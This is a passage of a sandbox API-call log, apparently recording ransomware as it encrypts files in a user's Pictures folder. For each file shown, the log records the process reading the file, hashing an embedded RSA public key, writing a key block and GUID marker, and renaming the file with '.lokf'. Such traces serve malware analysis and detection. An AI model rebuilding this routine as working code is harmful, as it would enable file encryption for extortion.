RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.080] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.081] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.081] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.081] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.081] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.081] GetLastError () returned 0x0 [0060.081] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.081] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.081] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.081] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.081] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.081] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.081] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1333, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.082] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.082] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.082] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.082] CloseHandle (hObject=0x5cc) returned 1 [0060.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.082] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.083] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\RqbMGhYZcZtImp-D.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\rqbmghyzcztimp-d.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\RqbMGhYZcZtImp-D.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\rqbmghyzcztimp-d.bmp.lokf")) returned 1 [0060.084] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e3520, ftCreationTime.dwHighDateTime=0x1d4d1e3, ftLastAccessTime.dwLowDateTime=0x1ee03350, ftLastAccessTime.dwHighDateTime=0x1d4cf50, ftLastWriteTime.dwLowDateTime=0x1ee03350, ftLastWriteTime.dwHighDateTime=0x1d4cf50, nFileSizeHigh=0x0, nFileSizeLow=0x10532, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VO-3YD 39RUJPvDS.bmp", cAlternateFileName="VO-3YD~1.BMP")) returned 1 [0060.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.084] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\VO-3YD 39RUJPvDS.bmp") returned=".bmp" [0060.084] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\VO-3YD 39RUJPvDS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\vo-3yd 39rujpvds.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.084] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=66866) returned 1 [0060.084] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.086] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1050c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.086] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.086] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.086] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10532, lpOverlapped=0x0) returned 1 [0060.087] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.087] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.087] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.087] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.087] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.088] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.088] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.088] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.088] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.088] GetLastError () returned 0x0 [0060.088] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.088] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.088] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.088] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.088] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.088] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.088] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.089] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10532, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.089] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.089] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.089] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.089] CloseHandle (hObject=0x5cc) returned 1 [0060.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.090] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.090] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\VO-3YD 39RUJPvDS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\vo-3yd 39rujpvds.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\VO-3YD 39RUJPvDS.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\vo-3yd 39rujpvds.bmp.lokf")) returned 1 [0060.091] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2f2e040, ftCreationTime.dwHighDateTime=0x1d4cf4d, ftLastAccessTime.dwLowDateTime=0x20b7a9b0, ftLastAccessTime.dwHighDateTime=0x1d4ca32, ftLastWriteTime.dwLowDateTime=0x20b7a9b0, ftLastWriteTime.dwHighDateTime=0x1d4ca32, nFileSizeHigh=0x0, nFileSizeLow=0x3a9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WY02osvbjefKkY2aG.bmp", cAlternateFileName="WY02OS~1.BMP")) returned 1 [0060.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.091] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.091] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\WY02osvbjefKkY2aG.bmp") returned=".bmp" [0060.092] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\WY02osvbjefKkY2aG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\wy02osvbjefkky2ag.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.092] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=15004) returned 1 [0060.092] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.093] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3a76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.093] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.094] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x3a9c, lpOverlapped=0x0) returned 1 [0060.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.094] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.094] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.094] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0060.095] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.095] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.095] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.095] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.095] GetLastError () returned 0x0 [0060.095] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.095] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0060.095] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.095] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.095] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.096] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.096] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3a9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.096] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.096] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.096] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.096] CloseHandle (hObject=0x5cc) returned 1 [0060.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0060.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.097] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\WY02osvbjefKkY2aG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\wy02osvbjefkky2ag.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\WY02osvbjefKkY2aG.bmp.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\wy02osvbjefkky2ag.bmp.lokf")) returned 1 [0060.098] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9665af0, ftCreationTime.dwHighDateTime=0x1d4cca2, ftLastAccessTime.dwLowDateTime=0x474e7720, ftLastAccessTime.dwHighDateTime=0x1d4c776, ftLastWriteTime.dwLowDateTime=0x474e7720, ftLastWriteTime.dwHighDateTime=0x1d4c776, nFileSizeHigh=0x0, nFileSizeLow=0x2fef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xjvwDn0SBdqUu-KgqN.jpg", cAlternateFileName="XJVWDN~1.JPG")) returned 1 [0060.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0060.098] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.098] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\xjvwDn0SBdqUu-KgqN.jpg") returned=".jpg" [0060.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\xjvwDn0SBdqUu-KgqN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt3t5yljsfwts8btn\\xjvwdn0sbdquu-kgqn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.098] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=12271) returned 1 [0060.098] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.100] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2fc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.100] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.101] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x2fef, lpOverlapped=0x0) returned 1 [0060.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.101] lstrlenA (lpString="-----BEGIN PUBLIC 